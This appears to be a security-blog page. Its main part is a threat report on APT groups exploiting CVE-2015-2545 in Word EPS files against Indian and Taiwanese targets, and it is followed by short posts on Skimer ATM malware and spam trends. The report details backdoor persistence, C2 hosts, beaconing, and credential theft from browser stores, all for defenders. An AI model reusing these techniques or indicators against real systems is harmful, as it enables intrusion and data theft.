The C&C server used in the attack was located in Japan and appears to have been compromised. However, there is no indication that it has ever been used for any other malicious purpose. Monitoring of the server activity for a period of several months did not result in any new findings. We believe the attackers either lost access to the server or realized that it resulted in too much attention from security researchers, as the attack was widely discussed by the Japanese security community.

According to our research partner in Japan, the original EvilPost attack in December 2015 arrived as a spear-phishing email with a Word document attached.

This document embedded an EPS object file, which triggered a vulnerability in the EPS format handler in Microsoft Word. Even with an exploit component, Microsoft Word rendered the document correctly and displayed the decoy message. The document is written in good Japanese, as shown below.

It has been used to decoy New Year impressions of defense-related organizations.

This attack was also described in the FireEye report, mentioned above.

An overview of the activity of the EvilPost group activity was provided to subscribers of the Kaspersky Lab Threat Intelligence Service in March 2016. For information about the service, please write to


In March and April 2016, a series of emails laced with an exploit forCVE-2015-2545 were detected. The emails were sent in spear-phishing attacks, presumably targeting organizations in Hong Kong. Identifying a specific group behind these attacks is difficult because they used a new variant of a widely available backdoor known as PoisonIvy (from which the name of the group, SPIVY, is derived). A description of these incidents can be found in the PaloAlto blog.

Danti and SVCMONDR

These two groups have not yet been publicly described. An overview of their attacks and the tools used is provided in this report.

Danti attacks

Danti (Kaspersky Lab’s internal name) is an APT actor that has been active at least since 2015, predominantly targeting Indian government organizations. According to our telemetry, Danti has also been actively hitting targets in Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines.

The group implemented a new campaign in February and March 2016, using a repurposed implementation of the CVE-2015-2545 exploit with custom shellcode. In order to infect the victim, the attackers distributed spear-phishing emails with an attached DOCX file exploiting the CVE-2015-2545 vulnerability in Microsoft Office. The exploit is based on a malformed embedded EPS (Encapsulated Postscript) object. This contains the shellcode that drops a backdoor, providing full access to the attackers.

Main findings:

  • Danti, a previously unknown group, is probably related to NetTraveller and DragonOK
  • In February-March 2016 the group was observed using CVE-2015-2545
  • It remains active, conducting attacks against Indian diplomatic organizations
  • Related attacks have been observed against Central and South East Asia targets

The campaign leveraging the exploit for CVE-2015-2545 took place in February 2016. As a result, several emails with attached DOCX files were uploaded to VirusTotal. The email recipients were connected to the Indian Ministry of External Affairs, as can be seen below:

  •, the Foreign Service Institute, Ministry of Foreign Affairs (Under Secretary (FT/NRG),
  •, possibly related to the Chumar military post in India, a disputed area between India and China (the mail server is the same as the Indian Ministry of Foreign Affairs-
  •, the Indian embassy in Hungary
  •, the Indian Embassy in Denmark
  •, the Indian embassy in Colombia

All these attacks took place between the 2nd and 29th of February, 2016.

Target and date Attachment name Sender Indian embassy in Hungary
2nd February Mission List.doc unknown (original email was forwarded) Indian embassy in Denmark
2nd February HQ List.doc ([]) Indian embassy in Colombia
2nd February HQ List.doc ([]) DSFSI
24th February India’s 10 Top Luxury Hotels.doc via ([]) Chumapost
29th February India’s 10 Top Luxury Hotels.doc via ([])

In the case of the Indian Embassy in Hungary, it looks like the original message was forwarded from the embassy to the Indian IT security team in the Ministry of Foreign Affairs, and uploaded later to Virus Total.

Initial vector

The emails that were analysed had originally been sent via “3capp-mailcom-lxa06.server.lan”, perhaps using a spam-mailer program. In all known cases, the sender used the same gate at (, a well-known open relay SMTP server.

The email messages changed for different waves of the campaign. When the campaign started in February 2nd, the emails carried the subject headers “Mission List” and “HQ List”, and forged the identity of a real sender.

Original message used in the first wave of attacks

As can be seen above, the original email was supposedly forwarded from Anil Kumar Balani, Director of the Department of Information Technology at the Indian Ministry of Communications & Information Technology.

Mission List decoy document

At the same time, attackers sent a slightly different document with the subject “HQ List” to other Indian embassies (for example, those in Denmark and Colombia):

Original HQ List email

K.Nagaraj Naidu is Director of the Investments Technology Promotion Division in the Ministry of External Affairs, and a former Counsellor (T&C) at the Embassy of India in China.

HQ List decoy document

Both files (“Mission List” and “HQ list”) have different decoy content, but both use the same CVE-2015-2545 EPS exploit (image1.eps, MD5 a90a329335fa0af64d8394b28e0f86c1).

Interestingly, as can be seen in their metadata, both files were modified by the user “India” on 01.02.2016, just one day before they were sent to targets.

“HQ List” metadata “Mission List” metadata

For the attacks at the end of February, the attackers decided to use the less relevant subject header of “10 top luxury hotels in India”, sent from an unknown sender.

Top Luxury Hotels spear-phishing email

This new attachment contains the same EPS exploit, but uses a different decoy document and a new payload.

Top 10 Luxury Hotels decoy document

The text of the document was copied from a Forbes article published in 2007. According to its metadata, the document was created in June 2015, so it has probably been used before in unknown attacks.

However, the same mail gate ( was used as for the 2nd February attacks.

Email header from February 29

Email header from February 24

All the “doc” files are Web Archive Files and contain decoy documents and a malicious EPS. The structure of the WAF files is the same in all three cases:

Web archive structure


The attackers used at least one known 1-day exploit: the exploitforCVE-2015-2545 – EPS parsing vulnerability in EPSIMP32.FLT module, reported by FireEye, and patched by Microsoft on 8 September 2015 with MS15-099.

We are currently aware of about four different variants of the exploit.

The original one was used in August 2015 against targets in India by the Platinum (TwoForOne) APT group.

Original EPS exploit, used in August 2015

The second (which is a modified variant of the original exploit) was used in EvilPost attacks against Japan in 2015, and then reused by cybercriminals in March 2016. This variant was also used by the APT16 group (ELMER backdoor) in Taiwan in December 2015. The second variant is easily recognized by the specific strings in its EPS shellcode:

The “h:\\test.txt” string could have been forgotten by the exploit developer

The third variant was used in December 2015 against a Taiwanese organization, and in February 2016 against an Indian diplomatic organization. This variant uses different shellcode but is based on the original exploit from the Platinum (TwoForOne) APT:

Can be recognized by “add2 <eb135” substring

In the third variant, the binaries with the encrypted malicious exe file and the decoy document can be found at the end of the files.

In the third variant, the binary starts with “PdPD” (50 64 50 44), a marker previously used for encrypted binaries by a number of APT groups (Anchor Panda, Samurai Panda, Temper Panda).

Encrypted data at the end of the eps file

The decryption function is 1-byte XOR with a key from “\x00” to “\xff” and replacement of the Odd byte for an Even byte in several hundred bytes from the header.

Decrypted exe file

Decrypted decoy document

We detected a few different EPS objects in the exploit and these are analyzed below. The fourth variant of the exploit is analyzed in the “March attack” section.

Read more about EPS objects and Payload in the Appendix.

March attack

At the end of March 2016, we discovered a new wave of attacks by the Danti group against Indian governmental institutions. On March 28th several malicious document were sent to various recipients at the Cabinet Secretariat of Government India from the email account of Ms. Richa Gaharwar (<>), Deputy Secretary at The Department of Administrative Reforms and Public Grievances, the nodal agency of the Government of India.

Email sent from the account of Ms. Richa Gaharwar

The message was sent from an internal IP address using Oracle Communications Messenger. This could mean that the employee workstation used to send the malicious emails had been fully compromised.

Email header

The attachment contains the file “Holidays in India in 2016.docx” with the embedded EPS exploit. This time the attackers used the second variant of the exploit (previously used by the EvilPost and APT16 groups), with minor changes:

  • They removed the part with the “h:\\test.txt” strings
  • Dropped the binary added at the end of the EPS object (the same as in the third variant of the exploit)

Instead of using the “PdPD” string as a marker for binary, they used a new identifier: “1111111122222222”

New identifier used

All these changes created a new variant of the exploit, detected by very few antivirus products.

The decoy document was created on January 27th, and then modified by adding the EPS exploit on March 28th, right before the attack.

Decoy document

According to its metadata, the document was created and modified by Chinese users:

Decoy´s metadata

March attack – payload

The dropped file is a RarSFX archive (331307 bytes). According to comments in the archive, this was also created by a Chinese user:

The dropper installs four files in the system. The “Appinfo.dat” file launches “PotPlayerMini.exe”, monitors the memory periodically with the GlobalMemoryStatus API function and writes the results to “C:\windows\memstatus.txt”

The main loader “PotPlayerMini.exe” is a legitimate multimedia player from Daum Communication. The file is signed with a legitimate signature from “Daum Communications Corp.”

Digital signature information

This legitimate file is used by the attackers to load a malicious, unsigned file from the same folder: PotPlayer.dll (the hardcoded PDB path inside is “C:\Users\john\Desktop\PotPlayer\Release\PotPlayer.pdb”). This, in turn executes appinfo.dat (the hardcoded PDB path inside is “D:\BaiduYunDownload\ServiceExe\Release\ServiceExe.pdb”), which is a Yoda-compressed binary. The backdoor code is stored inside update.dat.

The potplayer.dll “PreprocessCmdLineEx” export function:

  • Creates a service named “MemoryStatus” with a path to “appinfo.dat” file and sets it to HKEY_CURRENT_USER\ Software\Microsoft\Windows\CurrentVersion\Run with the name “potplayer”.
  • Opens “update.dat” file, decrypts it with xor operations and passes the execution to the result buffer.

“update.dat”, a backdoor:

Makes its first GET request to hardcoded CnC “” in order to get the new CnC in the response.

If 407 response code is returned (Proxy authentication required) then the sample sends the request again with “proxyname” string as the proxy username and “proxypass” string as the proxy password. That suggests that may be the sample is compiled using some builder where these parameters must be set manually and in this specific sample were not changed from default.

Finds “8FC628C9F43D42E2B77C2801518AF2A5” substring and decrypts it using AES CTR mode thrice using three 16-bytes keys.

Makes a POST request to the new CnC with “im=validate” URL parameter and expects “success” string as the response.

Forms the following structure in order to send to CnC in POST-request after AES encryption:

  • “CFB4CDE8-9285-4CC2-ACE2-CD9CCDF22C0D” string
  • Local IP
  • Host name
  • 0x3E9 dword
  • OS version
  • SYSTEM_INFO structure

Decrypts the response using AES with one key.


  • Passes execution to the new buffer
  • Enumerates drives and their type
  • Enumerates given registry key and value
  • Enumerates processes
  • Deletes given file
  • Creates given process
  • Writes to file and launches it
  • Enumerates services
  • Terminates given process
  • Provides shell via cmd.exe

The malware connects to the following C2s:

  • (
  • (

The connection:

The two hosts are dynamic DNS subdomains, using the provider CHANGEIP DNS.

SVCMONDR: the Taiwan case

In December 2015, we uncovered another example of the type of shellcode found in the exploit for CVE-2015-2545. On 11 December, a spear-phishing email was sent by attackers to an employee of a Taiwanese security software reseller.

Spear-phishing email

The attachment contained a Web Archive File with “1-3說明檔.doc” and a malicious EPS file inside.


This EPS (98c57aa9c7e3f90c4eb4afeba8128484) is exploit CVE-2015-2545 and contains an encrypted binary starting with “PdPD” (50 64 50 44), the same as seen in the Danti attacks.

The structure of the Web Archive also carries references to the same files as the Danti group (with image002.gif and “image002.eps”.) However, the files themselves are absent from the archive.

Part of the Web Archive

This resemblance could mean that we can attribute this case to the Danti group. However, it could also be a coincidence or yet another case of different groups using the same malicious code. That’s why we are noting this incident separately from the Danti group’s activity.

Interestingly, in the first few days of December, another group – APT16 (FireEye’s classification) also targeted Taiwan-based organizations with a CVE-2015-2545 EPS exploit, and its emails originated from the same domain as the one sent by the SVCMONDR attackers. However, it used another type of shellcode and a different backdoor – ELMER.

After opening the doc file (which is again a Web Archive File), the exploit drops and executes the Trojan program “svcmondr.exe” (8052234dcd41a7d619acb0ec9636be0b).

This queries the registry:

“HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings” and “HKCU\Software\Microsoft\Windows\CurrentVersion\InternetSettings\Connections\DefaultConnectionSettings” and compares the values. If they don’t coincide, it sets the “DefaultConnectionSettings” value from the HKEY_USERS to HKCU key.

It sets values taken from:

  1. HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ {A8A88C49-5EB2-4990-A1A2-0876022C854F}
  2. HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ {AEBA21FA-782A-4A90-978D-B72164C80120}
  3. HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10

To the appropriate HKCU key (for example: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ {A8A88C49-5EB2-4990-A1A2-0876022C854F}, etc.).

Then forms the structure in order to send it to the CnC in a POST-request with the following fields:

  • 0x8888 constant
  • 0x8000 constant
  • 18-bytes hex string based on CoCreateGuid function
  • Local IP
  • MAC address

Example of POST request

It encodes the resulting structure with base64. Example of a POST request:

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Content-Length: 112
Connection: Keep-Alive
Cache-Control: no-cache


Based on the CnC response, the sample:

  • Checks the password in the CnC response and compares it with the hardcoded password “1010” in its configuration structure. If the password is valid, it sets a “certified” flag and can further process the following commands.
  • Launches given command line with ShellExecute, writes output results to %tmp% file, sends results to CnC and deletes the file.
  • Downloads file to %Temp% folder.
  • Uploads given file to CnC.
  • Sets sleep interval.

All results sent to the CnC after processing commands are encrypted with RC4 with a MAC-address as a key.

The CnC points to an IP address in Hong Kong. This IP address belongs to a local private company, but falls within a range of IP addresses that belong to another enterprise that has already been identified as a host location for command and control servers that communicate with malware.

The CnC has been used in other APT incidents, attributed by FireEye to the group “admin@338” aka “Temper Panda” (,

In general, this IP address space from “New World Telecom HK” is one of the favorite places used by different Chinese-origin APT groups to host command & control servers/proxies.

Another detail suggesting a possible relationship between SVCMONDR and Temper Panda is the use of the “PdPD” (50 64 50 44) marker for encrypted binaries. According to Crowdstrike, the same marker has been used previously by a number of APT groups (Anchor Panda, Samurai Panda and Temper Panda).

The latest known activity of “admin@338” was in August 2015, when it was used to target Hong Kong-based media using its own tools, LOWBALL and BUBBLEWRAP.

However, we are unable to draw any conclusion regarding the relationship between the SVCMONDR group and Temper Panda.

According to KSN data, in addition to Taiwan, there are some SVCMONDR victims in Thailand.


We are currently aware of at least four different APT actors actively using exploits of the CVE-2015-2545 vulnerability: TwoForOne (also known as Platinum), EvilPost, APT16 and Danti.

These groups have their own toolsets of malicious program. Danti’s arsenal is more extensive than those of EvilPost and APT16, and in terms of functionality can be compared with Platinum. All groups are focused on targets in the Asian region and have never been seen in incidents in Western Europe or the USA.

The TwoForOne (Platinum) group is described in Microsoft research, APT16 in FireEye reports, and EvilPost and Danti in Kaspersky Lab private reports.

Danti is highly focused on diplomatic entities. It may already have full access to internal networks in Indian government structures. According to Kaspersky Security Network, some Danti Trojans have also been detected in Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines.

Despite the fact that Danti uses a 1-day exploit, the group is able to make its own modifications to bypass current antivirus detections. A number of the modules used by Danti have the same functionality as previously known and used malicious programs like NetTraveller and DragonOK.

The use of CVE-2015-2545 exploits is on the rise. In addition to the groups mentioned above, we have seen numerous examples of these exploits being used by traditional cybercriminals in mass mailings in February-April 2016. Such attacks mostly target financial institutions in Asia. Specifically, attacks have been recorded in Vietnam, the Philippines and Malaysia. There are reasons to believe that Nigerian cybercriminals are behind these attacks. In some cases, the infrastructure used is the same as the one we saw when analyzing the Adwind Trojan.

We expect to see more incidents with this exploit and we continue to monitor new waves of attacks and the potential relationship with other attacks in the region.

To know more about how to address the issue of known vulnerabilities most properly, read this post in the Kaspersky Business Blog.

Additional references:

The EPS Awakens
Part 1
Part 2

Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets

New Poison Ivy Rat Variant targets Hong-Kong-Pro-Democracy Activists

Microsoft research “Platinum”

EvilPost attacks (Kaspersky Lab Private Report, March 2016)

Appendix A: EPS Objects their payload and http.exe trojan analysis EPS Objects

File MD5: a90a329335fa0af64d8394b28e0f86c1
File type: Encapsulated Postscript File
Size: 189’238 bytes
File Name: image001.eps (from HQ list)

This EPS file contains a shellcode that decrypts and saves file “lsass.exe” and decoy document to disk.

The dropped malicious files are described below.

File MD5: 07f4b663cc3bcb5899edba9eaf9cf4b5
File type: Encapsulated Postscript File
Size: 211’766 bytes
File Name: image001.eps (from Mission list)

This EPS file contains a shellcode that decrypts and saves file “lsass.exe” and decoy document to disk.

The dropped malicious files are described below.

File MD5: b751323586c5e36d1d644ab42888a100
File type: Encapsulated Postscript File
Size: 398’648 bytes
File Name: image001.eps (from India’s 10 Top Luxury Hotels)

This EPS file contains a shellcode that decrypts and saves the dropper file (Windows CAB) and decoy document to disk.

The dropper and dropped malicious file “http.exe” are described below.

Payload analysis Backdoor File Name lsass.exe MD5 8ad9cb6b948bcf7f9211887e0cf6f02a File type PE32 executable for MS Windows (GUI) Intel 80386 32-bit Compilation timestamp 2015-12-28 07:47:54 PE Resources BIN (CHINESE SIMPLIFIED) Size 138’240 bytes

URL: http://goback.strangled[.]net:443/ [random string]
USER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Real IP:

Drops file from its resource section to %ALLUSERSPROFILE%\ IEHelper\mshtml.dll. The backdoor then writes a string to a given offset with the value dependent on the %ALLUSERSPROFILE% environment variable.

Thus, the md5 of dropped files can vary. Examples of md5 with standard variables:


Sets registry:

If user is not admin

“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersio\Run” value {53372C34-A872-FACF-70A7-A23C81C766C4} = “C:\Windows\System32\rundll32.exe %ALLUSERSPROFILE%\ \IEHelper\mshtml.dll, IEHelper”

In any case:

HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{53372C34-A872-FACF-70A7-A23C81C766C4}” value “StubPath” = “C:\Windows\System32\rundll32.exe %ALLUSERSPROFILE%\ \IEHelper\mshtml.dll, IEHelper”

Sets the following values before creating the instance of IE for communicating with the CnC:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ DisableFirstRunCustomize=1
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ Check_Associations=”no”
HKEY_CURRENT_USER\Software\Microsoft\Internet Connection Wizard\ Completed=1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ IEHarden=0

Collects the following info, encodes with base64 and sends to the CnC:

  • Memory status
  • OS version
  • User name
  • OEM code page identifier
  • Local IP
  • CPU speed

Forms the following body in POST request to the CnC:

Content-Disposition: form-data; name=”m1.jpg”
Content-Type: application/octet-steam

Where %x – decrypted adapter’s MAC address based on xor operation.

The URL path in the POST request is generated randomly with uppercase letters.

Example of CnC communication:

Based on the CnC response, the sample:

  • Provides shell via cmd.exe
  • Creates directory
  • Lists files in directory
  • Deletes file
  • Uploads given file to CnC
  • Enumerates drives, gets their type and available space
  • Launches given file
  • Moves file
  • Writes and appends to given file
  • Uninstalls itself
File Name mshtml.dll MD5 be0cc8411c066eac246097045b73c282
or bae673964e9bc2a45ebcc667895104ef
or different File type PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit Compilation timestamp 2015-12-28 07:45:20 Size 72’192 bytes

mshtml.dll repeats entirely the functionality of its dropper (CnC communication and commands processing) in its “IEhelper” export and is built on the same source code.

http.exe trojan MD5 6bbdbf6d3b24b8bfa296b9c76b95bb2f | Sun, 13 Apr 2008 18:32:45 GMT

Drops file to %Temp%\IXP000.TMP\http.exe and launches it.

Filename http.exe MD5 3fbe576d33595734a92a665e72e5a04f | Wed, 13 Jan 2016 10:25:10 GM CnC

Sets registry:

“IME_hp” = %ALLUSERPROFILE%\Accessories\wordpade.exe

“IME_hp” = %ALLUSERPROFILE%\Accessories\wordpade.exe

“IME_hp” = %ALLUSERPROFILE%\Accessories\wordpade.exe

Copies itself to %ALLUSERPROFILE%\Accessories\wordpade.exe, launches it and exits self-process.

wordpade.exe file proceeds:

Creates mutex “Global\wordIE”. Stores keystrokes and windows titles to %Temp%\dumps.dat and xors it with 0x99.

Knocks to CnC via IE instance:

Includes the following field in HTTP-header:

Cookie: ID=1%x, where %x – Volume Serial number of disk C

Based on the CnC response, the sample:

  • Provides shell via cmd.exe
  • Lists files in all drives and writes to given file
  • Retrieves OS version, Local IP, installed browser, Computer name, User name and writes to given file
  • Writes to given file
  • Deletes given file
  • Uploads given file to CnC
  • Makes screenshots and writes to file %Temp%\makescr.dat
  • Retrieves proxy settings and proxy authentication credentials from Mozilla (signons.sqlite, logins.json) and Chrome files (%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data), Microsoft WinInet storage, Microsoft Outlook
Appendix B: Danti sample hashes

aae962611da956a26a76d185455f1d44 (
3ed40dec891fd48c7ec6fa49b1058d24 (
1aefd1c30d1710f901c70be7f1366cae (
f4c1e96717c82b14ca76384cb005fbe5 (India,
1ba92c6d35b7a31046e013d35fa48775 (India,
6d55eb3ced35c7479f67167d84bf15f0 (India, Cabinet Secretary)

Doc (Web Archive File):
C591263d56b57dfadd06a68dd9657343 (HQ List)
Aebf03ceaef042a833ee5459016f5bde (Mission List)
Fd6636af7d2358c40fe6923b23a690e8 (India’s 10 Top Luxury Hotels)

D91f101427a39d9f40c41aa041197a9c (Holidays in India in 2016)

07f4b663cc3bcb5899edba9eaf9cf4b5 (India, from Mission list)
a90a329335fa0af64d8394b28e0f86c1 (India, HQ List)
B751323586c5e36d1d644ab42888a100 (India, Hotels)
8cd2eb90fabd03ac97279d398b09a5e9 (Holidays in India in 2016)

CAB dropper:


f16903b2ff82689404f7d0820f461e5d (clean tool)

6bbdbf6d3b24b8bfa296b9c76b95bb2f (dropper, from cab-archive)
3fbe576d33595734a92a665e72e5a04f (http.exe)
8ad9cb6b948bcf7f9211887e0cf6f02a (lsass.exe)
be0cc8411c066eac246097045b73c282 (mshtml.dll)
d44e971b202d573f8c797845c90e4658 (update.dat)
332397ec261393aaa58522c4357c3e48 (potplayer.dll)
2460871a040628c379e04f79af37060d (appinfo.dat)

Goback.strangled[.]net:443[.]org (,
newsupdate.dynssl[.]com (
dnsnews.dns05[.]com (

Appendix C: sample hashes of SVCMONDR attacks

7a60da8198c4066cc52d79eecffcb327 (Taiwan,

Doc (Web Archive File):
d0533874d7255b881187e842e747c268 (Taiwan, 1-3說明檔.doc)

98c57aa9c7e3f90c4eb4afeba8128484 (Taiwan)

8052234dcd41a7d619acb0ec9636be0b (svcmondr.ex, Taiwan)
046b98a742cecc11fb18d9554483be2d (svcmondr.ex,Thailand)


Lock Your Mobile Devices

SANS Tip of the Day - Mon, 05/23/2016 - 01:00
The number one step for protecting your mobile device is making sure it has a strong passcode or password lock on it so only you can access it.

Trust Your Instincts

SANS Tip of the Day - Fri, 05/20/2016 - 01:00
Ultimately, common sense is your best protection. If an email, phone call or online message seems odd, suspicious or too good to be true, it may be an attack.

ATM infector

Malware Alerts - Tue, 05/17/2016 - 06:57

Seven years ago, in 2009, we saw a completely new type of attack on banks. Instead of infecting the computers of thousands of users worldwide, criminals went directly after the ATM itself – infecting it with malware called Skimer. Seven years later, our Global Research and Analysis Team together with Penetration Testing Team have been called on for an incident response. They discovered a new, improved, version of Skimer.

Virus style infections

Criminals often obscured their malware with packers to make analysis more difficult for researchers. The criminals behind Skimer also did this, using the commercially available packer Themida, which packs both the infector and the dropper.

Once the malware is executed it checks if the file system is FAT32. If it is, it drops the file netmgr.dll in the folder C:\Windows\System32. If it is an NTFS file system, the same file will be placed in the NTFS data stream corresponding to the XFS service´s executable file. Placing the file in an NTFS data stream is most likely done to make forensic analysis more difficult.

After successful installation, the sample patches the XFS executable (SpiService.exe) entry point, in order to add a LoadLibrary call to the dropped netmgr.dll file. This file is also protected by Themida.

Entry point in SpiService.exe before infection

Entry point in SpiService.exe after infection

After a successful installation the ATM is rebooted. The malicious library will be loaded into the SpiService.exe thanks to the new LoadLibrary call, providing it with full access to XFS.


Unlike Tyupkin, where there was a magic code and a specific time frame where the malware was active, Skimer only wakes up when a magic card (specific Track 2 data, see IOCs at the bottom of this blogpost) is inserted. It is a smart way to implement access control to the malware’s functionality.

Once the magic card is inserted, the malware is ready to interact with two different types of cards, each with different functions:

  1. Card type 1 – request commands through the interface
  2. Card type 2 – execute the command hardcoded in the Track2

After the card is ejected, the user will be presented with a form, asking them to insert the session key in less than 60 seconds. Now the user is authenticated, and the malware will accept 21 different codes for setting its activity. These codes should be entered from the pin pad.

Below is a list of the most important features:

  1. Show installation details;
  2. Dispense money – 40 notes from the specified cassette;
  3. Start collecting the details of inserted cards;
  4. Print collected card details;
  5. Self delete;
  6. Debug mode;
  7. Update (the updated malware code is embedded on the card).

During its activity, the malware also creates the following files or NTFS streams (depending on the file system type). These files are used by the malware at different stages of its activity, such as storing the configuration, storing skimmed card data and logging its activity:

C:\Windows\Temp\attrib1 card data collected from network traffic or from the card reader; C:\Windows\Temp\attrib4 logs data from different APIs responsible for the communication with the keyboard (effectively logging data such as the pin); C:\Windows\Temp\mk32 same as attrib4; C:\Windows\Temp:attrib1 same as the homologue file; C:\Windows\Temp:attrib4 same as the homologue file; C:\Windows\Temp:mk32 same as the homologue file; C:\Windows\Temp:opt logs mule´s activity.

Main window

The following video details the scenario on how money mules interact with an infected ATM as described above.


During our recent Incident Response cases related to the abuse of ATMs, we have identified Tyupkin, Carbanak and black box attacks. The evolution of Backdoor.Win32.Skimer demonstrates the attacker interest in these malware families as ATMs are a very convenient cash-out mechanism for criminals.

One important detail to note about this case is the hardcoded information in the Track2 – the malware waits for this to be inserted into the ATM in order to activate. Banks may be able to proactively look for these card numbers inside their processing systems, and detect potentially infected ATMs, money mules, or block attempts to activate the malware.

We also recommend regular AV scans, the use of whitelisting technologies, a good device management policy, full disk encryption, the protection of ATM BIOS with a password, only allowing HDD booting, and isolating the ATM network from any other internal bank networks.

Kaspersky Lab has now identified 49 modifications of this malware, with 37 of these modifications targeting ATMs made by just one manufacturer. The most recent version was discovered at the beginning of May 2016.

All samples described are detected by Kaspersky Lab as Backdoor.Win32.Skimer. Patched SpiService.exe files are detected as Trojan.Win32.Patched.rb

As this is still an ongoing investigation, we have already shared the full report with different LEAs, CERTs, financial institutions and Kaspersky Lab Threat Intelligence-Service customers. For more information please contact

Appendix I. Indicators of Compromise Hashes




Track 2 data


The Rio Olympics: Scammers Already Competing

Malware Alerts - Mon, 05/16/2016 - 06:56

A few years ago, spammers and scammers were not as interested in the Olympics as they were in football (the World Cup and European Championships). The first major increase in the number of spam messages devoted to the Olympic Games occurred in the run-up to the Winter Olympics in Sochi in 2014. Since then, their interest in the Olympics has shown no sign of weakening and the upcoming event in Brazil is no exception.

Back in 2015, a year before the Olympics in Rio, we registered fake notifications of lottery wins allegedly organized by the country’s government and the International Olympic Committee. Similar emails continue to be sent in 2016. The vast majority of these messages contain a DOC or PDF attachment, while the body of the message includes only a brief text asking the recipient to open the attachment.

The name of the DOC file, the name of the sender and the subject line of the email often mention the Olympic Games.

The content of these attachments is fairly standard: a lottery was held by an official organization; the recipient’s address was randomly selected from a large number of email addresses, and to claim their winnings the recipient has to respond to the email and provide the necessary personal information.

We also came across emails without attachments; the text written by the scammers was included in the body of the message.

English is undoubtedly the most popular language used in fraudulent emails exploiting the Olympics theme, but we have also registered messages in other languages, for example Portuguese. In these the spammers stuck to the same story of a lottery win, trying to convince the recipient that the email is genuine.

In addition to fraudulent spam, we have registered unsolicited advertising messages containing offers for various goods and services that, one way or another, use the Olympics to grab the attention of recipients.

For example, spammers have been pushing new TVs for watching sporting events.

They also promised to make the recipient an “Olympic champion” with the help of magic pills.

Taking any of these emails seriously enough to reply to them could well leave you out of pocket. But the biggest hit that sporting fans’ wallets are likely to take are from fake ticketing services. We are constantly blocking dozens of newly registered domains with names containing the words “rio”, “rio2016” and so on. Each of these domains hosted good quality imitations of official services offering tickets to sporting events at this summer’s games in Rio de Janeiro.

The scammers register these domains to make their sites look more credible; for the same purpose, they often buy the cheapest and simplest SSL certificates. These certificates are registered within a few minutes, and certification authorities don’t verify the legal existence of the organization that has issued the certificate. The certificates simply provide data transfer over a secure protocol for the domain and, most importantly, gives fraudsters the desired “https” at the beginning of their address.

If you examine the whois data for such domains, you will find that they have only been registered recently, for a short period of time (usually a year) and in the names of individuals. Moreover, the detailed information is often hidden, and the hosting provider could be located anywhere, from Latin America to Russia.

The sites are necessary to implement a simple scam whereby the phishers ask for bank card information, allegedly to pay for tickets, and then use it to steal money from the victim’s bank account. In order to keep the buyer in the dark for some time, the scammers assure them that the payment has been received for the tickets and that they will be sent out two or three weeks before the event.

As a result, the criminals not only steal the victim’s money but deprive them of the chance of attending the Olympics – by the time they realize they won’t be getting the tickets they booked it will be too late to buy genuine tickets… especially if there’s no money in their bank account.

According to our information, the creation of these fake sites usually involves international cybercriminal groups, each fulfilling its own part of the scam. One group creates a website, the second registers the domains, the third collects people’s personal information and sells it, and the fourth withdraws the cash.

To avoid falling victim to the scammers’ tricks, sports fans should be careful and only buy tickets from authorized reseller sites and ignore resources offering tickets at very low prices. The official website of the Olympic Games provides a list of official ticket sellers in your region and a service that allows you to check the legitimacy of sites selling tickets.

Also, we strongly recommend not buying anything in stores advertised in spam mailings or advertising banners, whether it’s tickets or souvenirs related to the Olympics. At best, you’ll end up with non-certified goods of dubious quality, and at worst – you’ll just be wasting your money. For those who cannot resist impulse purchases, we recommend getting a separate bank card that is only used for online payments and which only ever has small sums of money on it. This will help to avoid serious losses if your banking information is stolen.

Spam and phishing in Q1 2016

Malware Alerts - Thu, 05/12/2016 - 06:56

Spam: features of the quarter Trending: dramatic increase in volume of malicious spam

The first quarter of 2016 saw a dramatic increase in the number of unsolicited emails containing malicious attachments. Over the last two years the number of email antivirus detections on computers with a Kaspersky Lab product installed fluctuated between 3 and 6 million. At the end of 2015 this number began to grow and in early 2016 there was a sharp upturn.

Number of email antivirus detections on computers with a Kaspersky Lab product installed

In March, the number of email antivirus detections reached 22,890,956, which is four times more than the average for the same period last year.

With the rise of drive-by-downloads, we could have expected malicious email attachments to have long since given way to malicious sites that the user accesses via a link in an email. However, the use of emails has its advantages (for the attackers): the content of the email may encourage the user not only to download a malicious file but also launch it. It’s also possible that malicious attachments are enjoying a new wave of popularity because in the last couple of years the developers of the most popular browsers have considered adding protection against infected and phishing websites (using in-house developments as well as partnering with well-known anti-virus vendors). This is something that built-in protection at the email client level does not provide yet. Therefore, if a potential victim doesn’t use antivirus software, their computer can be easily infected via email.

What’s inside?

The variety of malicious attachments is impressive. They include classic executable EXE files and office documents (DOC, DOCX, XLS, RTF) with embedded malicious macros, and programs written in Java and Javascript (JS files, JAR, WSF, WRN, and others).

Attachment containing a Trojan downloader written in Java

Also worth noting is the diversity of languages used in malicious spam. In addition to English, we regularly came across emails in Russian, Polish, German, French, Spanish, Portuguese and several other languages.

Attachment containing the Trojan banker Gozi

Most emails imitated notifications of unpaid bills, or business correspondence.

The malicious .doc file in the attachment is a Trojan downloader. It downloads and runs the encryptor Cryakl using macros written in Visual Basic

Attachment containing backdoor-type malware that downloads other malicious programs to the infected machine

